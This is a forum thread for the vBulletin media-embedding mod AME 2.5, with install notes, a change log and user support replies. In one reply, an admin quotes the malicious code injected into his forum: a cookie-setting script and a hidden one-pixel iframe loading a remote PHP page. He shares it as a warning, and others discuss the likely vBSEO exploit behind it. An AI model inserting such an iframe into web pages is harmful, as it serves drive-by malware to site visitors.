Major Additions - AME 2.5 - Media Embedding for posts, sigs, vm's, groups and blogs

From the makers of the letters O and Yea comes the hottest 'must have mod' of the season: AME 2.5 - The Return of The Hot Mama.

Thanks everyone for making AME 2.5 Mod of the Month

AME is the multi award winning modification that smartly scans new and edited posts for URLs from a customisable variety of web sites (i.e. YouTube or Amazon or about 200 others). If it finds a match, AME will 'transform' the URL into inline embedded media without your users ever having to even think about it.

It was important for me to create a system that did not need updating (and subsequent reinstalling) every time one of the sites it supported decided to change the way it displayed its media (which is all the fricken time). Therefore I built a system in which the 'definitions' for each site could be imported, exported, tweaked and shared on a whim. This way, you only have to import the definitions that you want. It also allows the vB community to get creative and share definitions that I wouldn't of thought of!

Which sites are supported?

Included in the default installation is YouTube and Amazon. At time of posting this, I believe that there are over 180 sites supported that have been created by the vBulletin community. These range from sites that stream videos to Amazon referral links to locally hosted music and video files.

Check out the 'add ons' section of this post below to see availible add-ons.

For a total list of features and an FAQ, see click here.
For a post on troubleshooting, click here.

Though not tested on any version of vBulletin lower than 3.7.4, in theory it should work on versions 3.5 and higher (just dont quote this bit!).

Big thanks goes out to all those in the community that have supported this mod. Especially Digital Jedi who gives great support on this mod and has created over 160 definitions for this system alone!


Installation/Upgrade

• Upload the contents of the forums folder into your forums directory and import the product-ame.xml file into your product manager (if upgrading, choose 'yes' to overwrite previous installation).
• After installation, make sure that the system is on (admincp->AME CP->Settings)
• Then you may want to try to rebuild old URLs via the tools option.

Change Log

• 20/1/09 - Uploaded to vb.org
• 22/1/09 - v. 2.5.2. Adresses a couple minor issues and character sets
• 23/1/09 - v. 2.5.3 minor update: Fixed ksort error on import and nomedia display
• 3/2/09 - v. 2.5.4 minor update to address rare bug with some page titles
• 3/7/09 - v.2.5.5 minor updates to address rare bug editing media with brackets in name
• 9/12/09 - v.2.5.6 minor updates youtubes validation process, a ccurl bug and rebuild not using the date like a good girl

nJoy

[ShackMaster]

BEWARE OF THIS PLUGIN! We believe we had a vulnerability using the AME (Auto Media Embedder) product/plugin and have removed the plugin. We are actually certain this was the culprit now that it has been removed and the malicious code is no longer a problem. Here is the malicious code it was injecting:

Code:

<script> function SetCookie(cookieName,cookieContent){ var cookiePath =
'/'; var expDate=new Date();
expDate.setTime(expDate.getTime()+372800000) ; var
expires=expDate.toGMTString();
document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires;
} SetCookie("hsmsdn", "turk"); </script> <iframe
name="1" width="1" height="1"
scrolling="no" frameborder="no" marginwidth="0"
marginheight="0"
src="http://www.chekolkal.co.cc/felk.php"></iframe>

Of course we got several warnings from Google who was blocking some of our pages due to the malicious code.

We tried to convert the AME code back to normal URL's prior to removing the product, but it would not work. We have removed it, but now those posts have the [ame] tags wrapped around a media link and we would like to remove them and not have to do it manually.

Is there an SQL query we can run that will remove all instances of [ame] and [/ame]?

Thanks!

[creativepart]

Looks sort of like the VBSEO injection exploit that simply placed the malicious code in the first Mod in your list and AME would generally be one of the first. That's what the exploit does -- it puts a base64 iframe in a plugin for one of the first mods on your mod list.

On my forum it placed the malware code in an All-Advertising mod plugin -- but it wasn't the mods fault.

Are you running VBSEO and have you upgraded the files to prevent the exploit?

[creativepart]

I recently ran a "rebuild post cache" maintenance routine and it disabled most if not all old YouTube vid links in AME. If I click on the post's edit button and then save it puts the vid back in the post. Otherwise it's just missing.

I know there are some tools, but I'm not sure which one to run to re-apply the mod to my existing posts. And, the warnings there kind of scared me off just giving it a try to see what happens.

Could you scale that learning curve for me and let me know which tool to use and how to apply it?

PS. I'm using VB 3,7.3 and AME 2.5.6 and the stock YouTube definition and nothing else.

[carsafety]

Hi-

Does anyone have a working Amazon affiliate definition? Amazon must have changed their format a while back, as my previous definition seems hit or miss lately. Thanks!

[BirdOPrey5]

I'm using this but it's pretty standard I think.

Regular Expression:

Code:

http://www\.amazon\.[a-z\.]*/[\w%-]*/[\w]+/([\w]+).*

Replacement:

Code:

<a href="$ameinfo[url]?tag=joesultofftop-20" target="_blank" title="$ameinfo[url]"><img src="images/misc/amazon_icon.gif" border="0" alt="$ameinfo[title]" />$ameinfo[title]</a>

Replace my affiliate code (in red) with your own.

[ShackMaster]

Quote:

Originally Posted by creativepart

Looks sort of like the VBSEO injection exploit that simply placed the malicious code in the first Mod in your list and AME would generally be one of the first. That's what the exploit does -- it puts a base64 iframe in a plugin for one of the first mods on your mod list.

On my forum it placed the malware code in an All-Advertising mod plugin -- but it wasn't the mods fault.

Are you running VBSEO and have you upgraded the files to prevent the exploit?

We do have one plugin ahead of where AME would be, but it is an Admin plugin, so there may have not been access available.

Yes... we have updated vBSEO to the latest version... immediately after we first got hit.

Will it now move to the next plugin on the list? Any idea what we need to install to block it?

[carsafety]

Quote:

Originally Posted by BirdOPrey5

I'm using this but it's pretty standard I think.

Yeah it looks like that's the same one I have, but it seems to fail far more often than in the past and I haven't figured out why yet. I guess I need to take some time to look at Amazon links and understand how the replacement definitions work. Granted, I've been meaning to do that for most of the year and was hoping someone had done the work for me lol.

Thanks for taking the time to post what you had though I greatly appreciate it!

[ShackMaster]

Quote:

Originally Posted by creativepart

Looks sort of like the VBSEO injection exploit that simply placed the malicious code in the first Mod in your list and AME would generally be one of the first. That's what the exploit does -- it puts a base64 iframe in a plugin for one of the first mods on your mod list.

On my forum it placed the malware code in an All-Advertising mod plugin -- but it wasn't the mods fault.

Are you running VBSEO and have you upgraded the files to prevent the exploit?

I opened a ticket with vBulletin and here is their response:

We're not aware of any vulnerability within vBulletin 3.8.6 for this however any issue with a plugin will relate specifically to their code. vBulletin just gives the code a 'hook' to attach to and allow it to run during a particular process - we do nothing specifically with a plugin's code.

Exactly what I suspected... neither party wants to accept responsibility or apparently even investigate if they have an security issue.

[legatw]

This modification increases the load on the server?

[BirdOPrey5]

All mods increase the load on the server but in the scheme of things not all that much.